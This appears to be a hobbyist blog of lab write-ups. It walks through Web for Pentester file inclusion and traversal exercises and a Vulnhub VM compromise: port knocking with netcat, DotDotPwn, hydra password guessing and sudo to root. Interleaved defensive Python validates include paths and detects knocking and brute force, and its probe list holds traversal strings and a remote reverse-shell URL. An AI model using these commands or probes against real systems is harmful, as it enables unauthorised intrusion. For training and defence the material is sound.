SSH Poisoning via LFI
ContactL3ft's Randomness
Random Gibberish from an Internet Hobo.
Friday, 22 May 2020
Saturday, 30 May 2015
Web for Pentester - File Inclusion
There are two types of File inclusion
Local and Remote
Example 1.
Below is an example of Local File Inclusion. Remote is also an option; however, I will cover that in Example 2.
Example 2.
After a quick edit, it was good to go.
I used Python's inbuilt SimpleHTTPServer to host the script on my machine, and set up a simple netcat listener for it to connect back to.
Alas!
Remote File Include: a php-reverse-shell which connected back to my netcat listener.
I won't cover escalating, that is for another day.
For now a foothold will suffice =)
Thanks for reading.
Web for Pentester - Directory Traversal
There are 3 Examples to complete.
Viewing the Source shows these better.
1. No real issues.
2. A different approach, as the first method didn't work.
3. This was much harder; after trying a few options, I decided to employ DotDotPwn to find it.
perl dotdotpwn.pl -m http-url -h 192.168.56.101 -u http://192.168.56.101/dirtrav/example3.php?file=TRAVERSAL -o unix -b -k root
Found!
Now to test it in a browser.
Further Reading can be found here:
Thanks for reading.
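As an added example (not part of the write-up or of PentesterLab's code), here is the defender's side of the two posts above: the check an application should run on a user-controlled include or file parameter before it touches the filesystem. The include root, the page allowlist and the probe list are assumptions made for illustration. It refuses remote URLs and stream wrappers (the RFI case; PHP's allow_url_include setting gates that as well, but the application should not rely on it alone), NUL bytes, anything that canonicalises outside the include directory (the ../ probes DotDotPwn sends), and anything not on an allowlist of page names.

```python
import os
from urllib.parse import unquote, urlsplit

# Assumed layout for the example; not the Web for Pentester VM's real paths.
INCLUDE_ROOT = "/var/www/pentesterlab/includes"
ALLOWED_PAGES = {"intro.php", "contact.php"}


def check_include(param, root=INCLUDE_ROOT, allowed=ALLOWED_PAGES):
    """Decide whether a user-supplied include target may be loaded.

    Returns (ok, reason, resolved_path).  `param` is the value as the web
    application sees it, i.e. after the web server's URL decoding.
    """
    root = os.path.realpath(root)

    # 1. Remote File Inclusion and stream wrappers: anything with a scheme
    #    ("http://host/shell.php", "file:///etc/passwd", "php://...") is
    #    refused outright, whatever allow_url_include says.
    if urlsplit(param).scheme:
        return False, "remote or wrapper scheme", None

    # 2. NUL bytes: historically used to chop off a ".php" suffix that the
    #    application appends ("../../etc/passwd%00.php").
    if "\x00" in param:
        return False, "NUL byte", None

    # 3. Canonicalise and confine.  realpath() collapses "..", doubled
    #    slashes and symlinks; an absolute param discards `root` in join(),
    #    so the commonpath check is what actually enforces the boundary.
    candidate = os.path.realpath(os.path.join(root, param))
    if os.path.commonpath([root, candidate]) != root:
        return False, "escapes include root", candidate

    # 4. Allowlist: only known page names directly under root.  This also
    #    catches oddities that stay inside root but name no real page
    #    (e.g. "....//....//etc/passwd" resolves to root/..../..../etc/passwd).
    if os.path.dirname(candidate) != root or os.path.basename(candidate) not in allowed:
        return False, "not an allowed page", candidate

    return True, "ok", candidate


# Constructed probes in the style of a DotDotPwn run against ?file=TRAVERSAL,
# written as they would appear in the raw query string.
PROBES = [
    "intro.php",
    "../../../../etc/passwd",
    "..%2f..%2f..%2f..%2fetc%2fpasswd",
    "....//....//....//etc/passwd",
    "/etc/passwd",
    "../../../../etc/passwd%00.php",
    "http://192.168.56.1:8000/php-reverse-shell.php",
]


def run_probes(probes=PROBES):
    """Map each raw probe to the check's verdict, decoding once like a web server would."""
    return {p: check_include(unquote(p))[1] for p in probes}


if __name__ == "__main__":
    for probe, verdict in run_probes().items():
        print(f"{verdict:26} {probe!r}")
```

The order of the checks matters: the scheme and NUL tests run on the raw string, the boundary test runs on the canonical path, and the allowlist is the last word, so a probe that survives canonicalisation (the "....//" variant stays inside the root) is still refused because it names no known page.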
Web for Pentester VM - Pentesterlab
Web for Pentester
Pentesterlab Course
VulnHub.com link
This VM is a very nice collection of the different web vulnerabilities.
The Pre-write up bit
Note: I don't do any of this for a living, and I don't claim to be all-knowing.
Any findings will be very brief, and sometimes incomplete.
And of course, it's gonna be back to front.
I'll decide on formatting it later on, but at the moment, I can't be bothered =)
Directory Traversal
Thursday, 16 April 2015
TopHatSec - Fartknocker VM - Hosted on Vulnhub
arp gives:
Address HWtype HWaddress Flags Mask Iface
192.168.56.102 ether 08:00:27:91:bc:58 C vboxnet0
Scan:
# Nmap 6.47 scan initiated Sat Apr 11 10:48:06 2015 as: nmap -sS -A -p- -oA fartknocker 192.168.56.102
Nmap scan report for 192.168.56.101
Host is up (0.0012s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:91:BC:58 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.18 ms 192.168.56.102
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Sat Apr 11 10:48:23 2015 -- 1 IP address (1 host up) scanned in 17.77 seconds
The scan shows a webserver running
Webscan:
- Nikto v2.1.5/2.1.5
+ Target Host: 192.168.56.101
+ Target Port: 80
+ GET /: Server leaks inodes via ETags, header found with file /, fields: 0x68 0x5105a792cb1f8
+ GET /: The anti-clickjacking X-Frame-Options header is not present.
+ OPTIONS /: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ -3233: GET /icons/README: /icons/README: Apache default file found.
Not much from that.......
So I decided to visit the page with a browser.
The link Wooah gives pcap1.pcap
Opening it up with Wireshark gives a lot of ICMP flying back and forth; however, lower down something is happening.
TCP Ports 7000, 8000, 9000 and 8888 are used.
I probed into this, knowing that knockd was a possibility (given there is a webserver running with no means of remote administration in place).
Given my Python abilities are... basic to say the least, I knocked up a simple bash script utilising netcat:
cat knock1.sh
#!/bin/bash
nc -v 192.168.56.102 7000
nc -v 192.168.56.102 8000
nc -v 192.168.56.102 9000
nc -v 192.168.56.102 8888
After a few frustrating attempts, it finally worked!
./knock1.sh
nc: connect to 192.168.56.102 port 7000 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 8000 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 9000 (tcp) failed: Connection refused
Connection to 192.168.56.102 8888 port [tcp/*] succeeded!
/burgerworld/
Visiting the site with a browser gives:
The link gives another pcap file, pcap2.pcap.
Wireshark shows some more ICMP and ARP traffic.
However, more connections are established, to different ports.
Connections to TCP 21, UDP 22, TCP 80 and 8080, then a connection was established to http-alt (port 8080) and data went back and forth.
So I probed with another bash script to ports 1,3,3,7 to no avail.
I decided to go slightly more upmarket and use knock-knock.
After a bit of tweaking the script kicked in.
[-] Scanning 192.168.56.102 with Nmap, this could take a minute...go get some coffee
[-] Sending default knockd sequence to 192.168.56.102
[-] Scanning again...too soon for more coffee???
[+] 1 new port(s) opened...
(1337, 'tcp')
Writing to output file - outfile.txt
[-] Sending default knockd sequence to 192.168.56.102
[-] Scanning again...too soon for more coffee???
[+] 1 new port(s) opened...
(1337, 'tcp')
Writing to output file - outfile.txt
It showed port 1337 was now open.
nc -vv 192.168.56.102 1337
Connection to 192.168.56.102 1337 port [tcp/*] succeeded!
/iamcornholio/
No pcap file this time though; however, "all about that base" was a clue.
echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" > base64_encoded.txt
base64 -d base64_encoded.txt
Open up SSH: 8888 9999 7777 6666
Another knocking sequence, so I returned to my bash script method.
#!/bin/bash
nc -v 192.168.56.102 8888
nc -v 192.168.56.102 9999
nc -v 192.168.56.102 7777
nc -v 192.168.56.102 6666
nc -v 192.168.56.102 22
./knock4.sh
nc: connect to 192.168.56.102 port 8888 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 9999 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 7777 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 6666 (tcp) failed: Connection refused
Connection to 192.168.56.102 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
Port 22 is now open, nice one!
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead #
# PASSWORD: nachosrule #
############################################
However this was not to be as smooth as I initially thought..
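The knockd behaviour this box relies on can be modelled in a few lines. This is an added example, not code from the write-up or from knockd itself: it replays constructed iptables LOG lines (the second pcap's sequence of TCP 21, UDP 22, TCP 80, TCP 8080, plus two sources that get it wrong) through a simplified version of knockd's matching, one attempt per source address, knocks in order, a wrong port resets the attempt, and the whole sequence has to land inside seq_timeout. The log lines, hostnames and addresses are constructed. The same logic pointed at real firewall logs shows who has been knocking on a host you look after.

```python
import re
from datetime import datetime

# Constructed iptables LOG lines (not from the VM).  192.168.56.1 knocks
# correctly, 192.168.56.50 hits port 22 over TCP instead of UDP, and
# 192.168.56.77 waits too long between the first and second knock.
SAMPLE_LOG = """\
Apr 12 14:59:01 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.1 DST=192.168.56.102 PROTO=TCP SPT=40001 DPT=21 SYN
Apr 12 14:59:01 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.1 DST=192.168.56.102 PROTO=UDP SPT=40002 DPT=22 LEN=9
Apr 12 14:59:02 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.1 DST=192.168.56.102 PROTO=TCP SPT=40003 DPT=80 SYN
Apr 12 14:59:02 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.1 DST=192.168.56.102 PROTO=ICMP TYPE=8 CODE=0
Apr 12 14:59:02 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.1 DST=192.168.56.102 PROTO=TCP SPT=40004 DPT=8080 SYN
Apr 12 15:00:10 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.50 DST=192.168.56.102 PROTO=TCP SPT=50001 DPT=21 SYN
Apr 12 15:00:10 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.50 DST=192.168.56.102 PROTO=TCP SPT=50002 DPT=22 SYN
Apr 12 15:00:11 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.50 DST=192.168.56.102 PROTO=TCP SPT=50003 DPT=80 SYN
Apr 12 15:00:11 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.50 DST=192.168.56.102 PROTO=TCP SPT=50004 DPT=8080 SYN
Apr 12 15:01:00 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.77 DST=192.168.56.102 PROTO=TCP SPT=60001 DPT=21 SYN
Apr 12 15:01:20 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.77 DST=192.168.56.102 PROTO=UDP SPT=60002 DPT=22 LEN=9
Apr 12 15:01:21 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.77 DST=192.168.56.102 PROTO=TCP SPT=60003 DPT=80 SYN
Apr 12 15:01:21 Huhuhhhhhuhuhhh kernel: IN=eth0 OUT= SRC=192.168.56.77 DST=192.168.56.102 PROTO=TCP SPT=60004 DPT=8080 SYN
"""

# The "door" as knockd's config would describe it: ordered (port, protocol)
# pairs plus the seq_timeout within which the whole sequence must arrive.
DOOR_SEQUENCE = [(21, "TCP"), (22, "UDP"), (80, "TCP"), (8080, "TCP")]
SEQ_TIMEOUT = 5.0

FIELD = {k: re.compile(rf"\b{k}=(\S+)") for k in ("SRC", "PROTO", "DPT")}


def parse_line(line):
    """Return (timestamp, src, (dport, proto)), or None for lines without a port."""
    hits = {k: rx.search(line) for k, rx in FIELD.items()}
    if not all(hits.values()):
        return None  # e.g. an ICMP echo: no DPT field, so it cannot be a knock
    ts = datetime.strptime(" ".join(line.split()[:3]), "%b %d %H:%M:%S")
    return ts, hits["SRC"].group(1), (int(hits["DPT"].group(1)), hits["PROTO"].group(1))


def find_knock_sequences(lines, sequence=DOOR_SEQUENCE, seq_timeout=SEQ_TIMEOUT):
    """Simplified model of knockd's matching (an assumption of this example,
    not knockd's exact code): one attempt per source, every packet must hit
    the next port in order, a wrong port resets the attempt, and the whole
    sequence must complete within seq_timeout seconds of the first knock."""
    attempts = {}   # src -> (index of the next expected knock, time of first knock)
    completed = []  # (src, time the final knock landed)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, knock = rec
        stage, started = attempts.get(src, (0, None))
        if stage and (ts - started).total_seconds() > seq_timeout:
            stage, started = 0, None            # attempt expired, start over
        if knock == sequence[stage]:
            started = ts if stage == 0 else started
            stage += 1
            if stage == len(sequence):
                completed.append((src, ts))
                attempts.pop(src, None)
            else:
                attempts[src] = (stage, started)
        elif knock == sequence[0]:
            attempts[src] = (1, ts)             # wrong port, but it begins a fresh attempt
        else:
            attempts.pop(src, None)             # wrong port: sequence broken
    return completed


if __name__ == "__main__":
    for src, ts in find_knock_sequences(SAMPLE_LOG.splitlines()):
        print(f"{src} completed the sequence at {ts:%H:%M:%S}")
```

Two details carry over to real deployments: the protocol is part of the knock (the write-up's nc-only script could never satisfy the UDP 22 step), and the timeout is measured from the first knock, so a slow manual sequence fails even when every port is right.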
butthead@192.168.56.102's password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)
* Documentation: https://help.ubuntu.com/
Last login: Sun Apr 12 15:01:54 2015 from 192.168.56.1
You are only logging in for a split second! What do you do!
Connection to 192.168.56.102 closed.
A little digging in the man pages of ssh and I stumbled across it:
NAME
ssh — OpenSSH SSH client (remote login program)
SYNOPSIS
ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
[-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file]
[-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option]
[-p port] [-Q cipher | cipher-auth | mac | kex | key] [-R [bind_address:]port:host:hostport]
[-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]
ssh -l butthead 192.168.56.102 /bin/bash
butthead@192.168.56.102's password:
After a few seconds of waiting and thinking, I gave the "ls" command.
ls
files.txt
nachos
id
uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
cat nachos
Great job on getting this far.
Can you login as beavis or root ?
This was another hint..
cat /etc/passwd | grep beavis
beavis:x:1000:1000:beavis,,,:/home/beavis:/bin/bash
I took a while looking through the home folder of "beavis" and, not finding much, I decided to set hydra loose on the ssh service.
After no luck using conventional wordlists, I used cewl to generate my own from a Wikipedia page on Beavis and Butthead.
[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
---snip-----
[ERROR] ssh protocol error
[22][ssh] host: 192.168.56.101 login: beavis password: mikejudge
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-12 22:08:18
Hydra had found a valid password for the user "beavis"
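A hydra run like the one above leaves a very recognisable trail in /var/log/auth.log: a burst of "Failed password" lines from one address, then an "Accepted password" for the same user from that address. As an added example (not from the write-up), here is a small detector over constructed auth.log lines; the threshold, the window and the sample lines are assumptions, tune the first two for the host you are watching.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt (not from the VM): ten failures for beavis in
# ten seconds from one address, then a success from that address, and one
# ordinary mistyped-then-correct login from another address.
SAMPLE_AUTH_LOG = [
    f"Apr 12 22:07:{40 + i:02d} Huhuhhhhhuhuhhh sshd[{2201 + i}]: "
    f"Failed password for beavis from 192.168.56.1 port {51001 + i} ssh2"
    for i in range(10)
] + [
    "Apr 12 22:08:18 Huhuhhhhhuhuhhh sshd[2230]: Accepted password for beavis from 192.168.56.1 port 51013 ssh2",
    "Apr 12 22:15:00 Huhuhhhhhuhuhhh sshd[2300]: Failed password for butthead from 192.168.56.9 port 40000 ssh2",
    "Apr 12 22:15:30 Huhuhhhhhuhuhhh sshd[2301]: Accepted password for butthead from 192.168.56.9 port 40001 ssh2",
]

# OpenSSH's password-auth log line; "invalid user" appears when the name does not exist.
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def detect_ssh_bruteforce(lines, threshold=6, window_seconds=60):
    """Flag sources with >= threshold failed passwords inside a sliding window,
    and record whether the same source later gets an 'Accepted' (the hydra
    pattern: many failures, then one success).  Returns a list of alert dicts."""
    recent = defaultdict(deque)  # src -> timestamps of failures inside the window
    alerts = {}                  # src -> alert dict
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        src, user = m["src"], m["user"]
        if m["result"] == "Failed":
            q = recent[src]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()  # drop failures that fell out of the window
            if len(q) >= threshold:
                alert = alerts.setdefault(src, {
                    "src": src, "users": set(), "failures": 0,
                    "first": q[0], "success_after": None,
                })
                alert["users"].add(user)
                alert["failures"] = max(alert["failures"], len(q))
        elif src in alerts:
            # A success from a source already flagged is the high-priority case.
            alerts[src]["success_after"] = (user, ts)
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        outcome = "then SUCCEEDED as %s" % a["success_after"][0] if a["success_after"] else "no success seen"
        print(f"{a['src']}: {a['failures']} failures for {sorted(a['users'])}, {outcome}")
```

On this sample the detector flags 192.168.56.1 on its sixth failure and upgrades the alert when the later "Accepted password" arrives; the single typo from 192.168.56.9 never reaches the threshold. Rate limiting at the firewall or fail2ban would have stopped the wordlist run long before hydra reached the right entry.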
Logging in....
beavis@192.168.56.102's password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)
* Documentation: https://help.ubuntu.com/
Last login: Sun Apr 12 17:07:32 2015 from 192.168.56.1
beavis@Huhuhhhhhuhuhhh:~$
It was starting to go very well, time to start looking for ways to obtain root...
beavis@Huhuhhhhhuhuhhh:~$ id
uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
beavis@Huhuhhhhhuhuhhh:~$ sudo -l
[sudo] password for beavis:
Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User beavis may run the following commands on Huhuhhhhhuhuhhh:
(ALL : ALL) ALL
beavis@Huhuhhhhhuhuhhh:~$
A quick check of id shows beavis is in group 27(sudo) and can run commands (ALL : ALL) ALL.
beavis@Huhuhhhhhuhuhhh:~$ sudo bash
root@Huhuhhhhhuhuhhh:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Huhuhhhhhuhuhhh:~# cd /root
root@Huhuhhhhhuhuhhh:/root# ls
SECRETZ
root@Huhuhhhhhuhuhhh:/root# more SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!
SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"
admin@top-hat-sec.com
root@Huhuhhhhhuhuhhh:/root#
Fin:
Thanks to everyone at Vulnhub for the guidance over the time I've been there.
Special Thanks To Tophatsec for creating this challenge.